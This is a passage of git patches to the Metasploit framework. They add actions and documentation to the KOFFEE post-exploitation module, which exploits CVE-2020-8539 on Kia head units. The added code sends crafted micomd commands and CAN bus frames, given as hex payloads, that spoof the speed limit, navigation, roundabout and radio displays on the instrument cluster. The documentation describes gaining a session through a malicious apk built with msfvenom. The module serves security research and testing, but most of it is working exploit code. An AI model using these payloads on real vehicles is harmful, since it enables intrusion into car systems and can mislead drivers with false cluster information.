send_out_custom('4D3 01') From 3c64475da9323b56565cd10d88d0e224c4756bc6 Mon Sep 17 00:00:00 2001 From: gianpyc Date: Thu, 22 Apr 2021 04:34:22 -0400 Subject: [PATCH 6/8] Adding new actions on the module and updated documentation --- .../modules/post/android/local/koffee.md | 6 +- modules/post/android/local/koffee.rb | 63 +++++++++++++++++-- 2 files changed, 64 insertions(+), 5 deletions(-) diff --git a/documentation/modules/post/android/local/koffee.md b/documentation/modules/post/android/local/koffee.md index f5d27ff59e..09f0906902 100644 --- a/documentation/modules/post/android/local/koffee.md +++ b/documentation/modules/post/android/local/koffee.md @@ -35,7 +35,11 @@ metasploit input console the action name in lowercase, e.g., camera_reverse_off. - CAMERA_REVERSE_OFF: It hides the parking camera video stream - CAMERA_REVERSE_ON: It shows the parking camera video stream -- CHANGE_CLUSTER_LANGUAGE: It changes the cluster language +- CLUSTER_CHANGE_LANGUAGE: It changes the cluster language +- CLUSTER_RADIO_INFO: It shows radio info in the instrument cluster +- CLUSTER_RANDOM_NAVIGATION: It shows navigation signals in the instrument cluster +- CLUSTER_ROUNDABOUT_FARAWAY: It shows a round about signal with variable distance in the instrument cluster +- CLUSTER_SPEED_LIMIT: It changes the speed limit shown in the instrument cluster - HIGH_SCREEN_BRIGHTNESS: It increases the head unit screen brightness - INJECT_CUSTOM: It injects custom micom payloads - LOW_FUEL_WARNING: It pops up a low fuel message on the head unit diff --git a/modules/post/android/local/koffee.rb b/modules/post/android/local/koffee.rb index fee272fae8..34b90f62b5 100644 --- a/modules/post/android/local/koffee.rb +++ b/modules/post/android/local/koffee.rb @@ -41,11 +41,15 @@ class MetasploitModule < Msf::Post [ 'SET_NAVIGATION_ADDRESS', { 'Description' => 'It pops up the navigation address window' } ], [ 'SEEK_DOWN_SEARCH', { 'Description' => 'It triggers the seek down radio frequency search' } ], [ 'SEEK_UP_SEARCH', { 'Description' => 'It triggers the seek up radio frequency search' } ], - [ 'SWITCH_ON_Hu', { 'Description' => 'It switches on the head unit' } ], - [ 'SWITCH_OFF_Hu', { 'Description' => 'It switches off the head unit' } ], + [ 'SWITCH_ON_HU', { 'Description' => 'It switches on the head unit' } ], + [ 'SWITCH_OFF_HU', { 'Description' => 'It switches off the head unit' } ], [ 'CAMERA_REVERSE_ON', { 'Description' => 'It shows the parking camera video stream' } ], [ 'CAMERA_REVERSE_OFF', { 'Description' => 'It hides the parking camera video stream' } ], - [ 'CHANGE_CLUSTER_LANGUAGE', { 'Description' => 'It changes the cluster language' } ], + [ 'CLUSTER_CHANGE_LANGUAGE', { 'Description' => 'It changes the cluster language' } ], + [ 'CLUSTER_SPEED_LIMIT', { 'Description' => 'It changes the speed limit shown in the instrument cluster' } ], + [ 'CLUSTER_ROUNDABOUT_FARAWAY', { 'Description' => 'It shows a round about signal with variable distance in the instrument cluster ' } ], + [ 'CLUSTER_RANDOM_NAVIGATION', { 'Description' => 'It shows navigation signals in the instrument cluster ' } ], + [ 'CLUSTER_RADIO_INFO', { 'Description' => 'It shows radio info in the instrument cluster ' } ], [ 'INJECT_CUSTOM', { 'Description' => 'It injects custom micom payloads' } ] ], 'DefaultAction' => 'TOGGLE_RADIO_MUTE', @@ -180,7 +184,7 @@ class MetasploitModule < Msf::Post send_in('8353 03 00') end - def action_change_cluster_language + def action_cluster_change_language print_status(' -- Korean -- ') send_out_custom('4D3 01') print_status(' -- Arabic -- ') @@ -191,6 +195,57 @@ class MetasploitModule < Msf::Post send_out_custom('4D3 12') end + def action_cluster_speed_limit + print_status(' -- Chaning speed limit on the instrument cluster -- ') + send_out_custom('4DB 00 0A') + send_out_custom('4DB 00 2A') + send_out_custom('4DB 00 3A') + send_out_custom('4DB 00 5A') + send_out_custom('4DB 00 7A') + send_out_custom('4DB 00 9A') + send_out_custom('4DB 00 AA') + send_out_custom('4DB 00 BA') + end + + def action_cluster_roundabout_faraway + print_status(' -- km -- ') + send_out_custom('4D1 66 00 00 00 14 86 10 00') + print_status(' -- mi -- ') + send_out_custom('4D1 66 00 00 00 14 86 20 00') + print_status(' -- ft -- ') + send_out_custom('4D1 66 00 00 00 14 86 30 00') + print_status(' -- yd -- ') + send_out_custom('4D1 66 00 00 00 14 86 40 00') + print_status(' -- No distance -- ') + send_out_custom('4D1 66 00 00 00 14 86 50 00') + end + + def action_cluster_random_navigation + print_status(' -- Calculating the route -- ') + send_out_custom('4D1 09') + print_status(' -- Recalculating the route -- ') + send_out_custom('4D1 0A') + print_status(' -- Straight ahead -- ') + send_out_custom('4D1 0D') + print_status(' -- Exit on the Right -- ') + send_out_custom('4D1 13') + print_status(' -- Exit on the Left -- ') + send_out_custom('4D1 14') + end + + def action_cluster_radio_info + print_status(' -- USB Music -- ') + send_out_custom('4D6 65') + print_status(' -- Android Auto -- ') + send_out_custom('4D6 6F') + print_status(' -- FM 168.17 -- ') + send_out_custom('4D6 11 9D 00 00 00 00 5F 83') + print_status(' -- FM1 168.17 -- ') + send_out_custom('4D6 12 9D 00 00 00 00 5F 83') + print_status(' -- FM2 168.17 -- ') + send_out_custom('4D6 13 9D 00 00 00 00 5F 83') + end + def action_inject_custom print_status(" -- Injecting custom payload (#{datastore['CMD_PAYLOAD']}) -- ") send_custom(datastore['CMD_PAYLOAD']) From 12cb8b3f0203854a075ce38a1b5aac9bc58e9195 Mon Sep 17 00:00:00 2001 From: gianpyc Date: Thu, 22 Apr 2021 04:49:22 -0400 Subject: [PATCH 7/8] Removed not needed require --- modules/post/android/local/koffee.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/post/android/local/koffee.rb b/modules/post/android/local/koffee.rb index 34b90f62b5..18be6b1a24 100644 --- a/modules/post/android/local/koffee.rb +++ b/modules/post/android/local/koffee.rb @@ -4,7 +4,6 @@ # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## -require 'readline' class MetasploitModule < Msf::Post From 50873d3d888d84f1e897e184ad3431f148304c35 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Fri, 23 Apr 2021 09:24:38 -0400 Subject: [PATCH 8/8] Fix some typos and markdown formatting --- .../modules/post/android/local/koffee.md | 77 +++++++++++-------- modules/post/android/local/koffee.rb | 13 ++-- 2 files changed, 50 insertions(+), 40 deletions(-) diff --git a/documentation/modules/post/android/local/koffee.md b/documentation/modules/post/android/local/koffee.md index 09f0906902..de10cff70c 100644 --- a/documentation/modules/post/android/local/koffee.md +++ b/documentation/modules/post/android/local/koffee.md @@ -1,9 +1,8 @@ ## Vulnerable Application -KOFFEE exploits the CVE-2020-8539, which is an Arbitrary Code Execution vulnerabilty that allows a user -to execute the micomd binary with valid payloads on Kia Motors Head Units. -By using KOFFEE an attacker can send crafted micomd commands to control the head unit and send CAN bus frames -into the Multimedia CAN (M-Can) of the vehicle. +KOFFEE exploits the CVE-2020-8539, which is an Arbitrary Code Execution vulnerability that allows a user to execute the +`micomd` binary with valid payloads on Kia Motors Head Units. By using KOFFEE an attacker can send crafted `micomd` +commands to control the head unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle. ### Vulnerable Head Unit software versions - SOP.003.30.180703 @@ -21,38 +20,48 @@ into the Multimedia CAN (M-Can) of the vehicle. * An active session with the Head Unit ## Options -- MICOMD: it contains the path to micomd executable -- NUM_MSG: it expresses the number of MICOM commands sent each time -- PERIOD: it indicates the time (ms) interval between two MICOM commands, aka Period of CAN frames -- SESSION: it referes to the metasploit session number on which this module is run. -- CMD_PAYLOAD: It refers to the Micom payload to be injected, e.g., cmd byte1 byte3 byte2'. -By default it is set to `00 00 00`. This options works only for the `INJECT_CUSTOM` action + +### MICOMD +It contains the path to micomd executable + +### NUM_MSG +It expresses the number of MICOM commands sent each time + +### PERIOD +It indicates the time (ms) interval between two MICOM commands, aka Period of CAN frames + +### SESSION +It refers to the metasploit session number on which this module is run. + +### CMD_PAYLOAD +It refers to the Micom payload to be injected, e.g., cmd byte1 byte3 byte2'. By default it is set to `00 00 00`. This +options works only for the `INJECT_CUSTOM` action ## Actions -The following actions can be triggered on the Head Unit. An action can be triggerd by inserting in the -metasploit input console the action name in lowercase, e.g., camera_reverse_off. +The following actions can be triggered on the Head Unit. An action can be triggered by inserting in the Metasploit input +console the action name in lowercase, e.g., `camera_reverse_off`. -- CAMERA_REVERSE_OFF: It hides the parking camera video stream -- CAMERA_REVERSE_ON: It shows the parking camera video stream -- CLUSTER_CHANGE_LANGUAGE: It changes the cluster language +- CAMERA_REVERSE_OFF: It hides the parking camera video stream +- CAMERA_REVERSE_ON: It shows the parking camera video stream +- CLUSTER_CHANGE_LANGUAGE: It changes the cluster language - CLUSTER_RADIO_INFO: It shows radio info in the instrument cluster - CLUSTER_RANDOM_NAVIGATION: It shows navigation signals in the instrument cluster - CLUSTER_ROUNDABOUT_FARAWAY: It shows a round about signal with variable distance in the instrument cluster - CLUSTER_SPEED_LIMIT: It changes the speed limit shown in the instrument cluster -- HIGH_SCREEN_BRIGHTNESS: It increases the head unit screen brightness -- INJECT_CUSTOM: It injects custom micom payloads -- LOW_FUEL_WARNING: It pops up a low fuel message on the head unit -- LOW_SCREEN_BRIGHTNESS: It decreses the head unit screen brightness -- MAX_RADIO_VOLUME: It sets the radio volume to the max - - NAVIGATION_FULL_SCREEN: It pops up the nagitaion app -- REDUCE_RADIO_VOLUME: It reduces radio volume -- SEEK_DOWN_SEARCH: It triggers the seek down radio frequency search -- SEEK_UP_SEARCH: It triggers the seek up radio frequency search -- SET_NAVIGATION_ADDRESS: It pops up the nagitaion address window -- SWITCH_OFF_Hu: It switches off the head unit -- SWITCH_ON_Hu: It switches on the head unit - - TOGGLE_RADIO_MUTE It mutes/umutes the radio +- HIGH_SCREEN_BRIGHTNESS: It increases the head unit screen brightness +- INJECT_CUSTOM: It injects custom micom payloads +- LOW_FUEL_WARNING: It pops up a low fuel message on the head unit +- LOW_SCREEN_BRIGHTNESS: It decreases the head unit screen brightness +- MAX_RADIO_VOLUME: It sets the radio volume to the max +- NAVIGATION_FULL_SCREEN: It pops up the navigation app +- REDUCE_RADIO_VOLUME: It reduces radio volume +- SEEK_DOWN_SEARCH: It triggers the seek down radio frequency search +- SEEK_UP_SEARCH: It triggers the seek up radio frequency search +- SET_NAVIGATION_ADDRESS: It pops up the navigation address window +- SWITCH_OFF_Hu: It switches off the head unit +- SWITCH_ON_Hu: It switches on the head unit +- TOGGLE_RADIO_MUTE It mutes/unmutes the radio An action can be also triggered using the commands: - [ ] `set action CAMERA_REVERSE_ON` @@ -65,16 +74,16 @@ The commands to use to trigger this action are - [ ] `run` ## Scenarios -KOFFEE can be run as post-exploitation module when an active session is available with the Head Unit (HU). -First, an attacker may create a malicious apk to generate a remote connection with the HU. -For instace, using msfvenom or other tools, an attacker can create the malicious apk that, once installed in the HU, -starts an active session. Now, the attacker is able to use the KOFFEE exploit to take control of the HU and -inject CAN bus frames into the M-CAN bus of the vehicle. +KOFFEE can be run as post-exploitation module when an active session is available with the Head Unit (HU). First, an +attacker may create a malicious apk to generate a remote connection with the HU. For instance, using msfvenom or other +tools, an attacker can create the malicious apk that, once installed in the HU, starts an active session. Now, the +attacker is able to use the KOFFEE exploit to take control of the HU and inject CAN bus frames into the M-CAN bus of the +vehicle. ### Usage -```bach +``` msf6 > use post/android/local/koffee msf6 post(android/local/koffee) > set session 1 session => 1 diff --git a/modules/post/android/local/koffee.rb b/modules/post/android/local/koffee.rb index 18be6b1a24..e9c15cfc0e 100644 --- a/modules/post/android/local/koffee.rb +++ b/modules/post/android/local/koffee.rb @@ -13,10 +13,11 @@ class MetasploitModule < Msf::Post info, 'Name' => 'KOFFEE - Kia OFFensivE Exploit', 'Description' => %q{ - This module exploits CVE-2020-8539, which is an arbitrary code execution vulnerability that allows an to attacker execute the micomd binary file on the head unit of Kia Motors. - This module has been tested on SOP.003.30.18.0703, SOP.005.7.181019 and SOP.007.1.191209 head unit software version. - This module, run on an active session, allows an attacker to send crafted micomd commands that allow the attacker - to control the head unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle. + This module exploits CVE-2020-8539, which is an arbitrary code execution vulnerability that allows an to + attacker execute the micomd binary file on the head unit of Kia Motors. This module has been tested on + SOP.003.30.18.0703, SOP.005.7.181019 and SOP.007.1.191209 head unit software versions. This module, run on an + active session, allows an attacker to send crafted micomd commands that allow the attacker to control the head + unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle. }, 'SessionTypes' => ['meterpreter'], 'Author' => @@ -31,9 +32,9 @@ class MetasploitModule < Msf::Post ], 'Actions' => [ [ 'TOGGLE_RADIO_MUTE', { 'Description' => 'It mutes/umutes the radio' } ], - [ 'REDUCE_RADIO_VOLUME', { 'Description' => 'It decreses the radio volume' } ], + [ 'REDUCE_RADIO_VOLUME', { 'Description' => 'It decreases the radio volume' } ], [ 'MAX_RADIO_VOLUME', { 'Description' => 'It sets the radio volume to the max' } ], - [ 'LOW_SCREEN_BRIGHTNESS', { 'Description' => 'It decreses the head unit screen brightness' } ], + [ 'LOW_SCREEN_BRIGHTNESS', { 'Description' => 'It decreases the head unit screen brightness' } ], [ 'HIGH_SCREEN_BRIGHTNESS', { 'Description' => 'It increases the head unit screen brightness' } ], [ 'LOW_FUEL_WARNING', { 'Description' => 'It pops up a low fuel message on the head unit' } ], [ 'NAVIGATION_FULL_SCREEN', { 'Description' => 'It pops up the navigation app window' } ],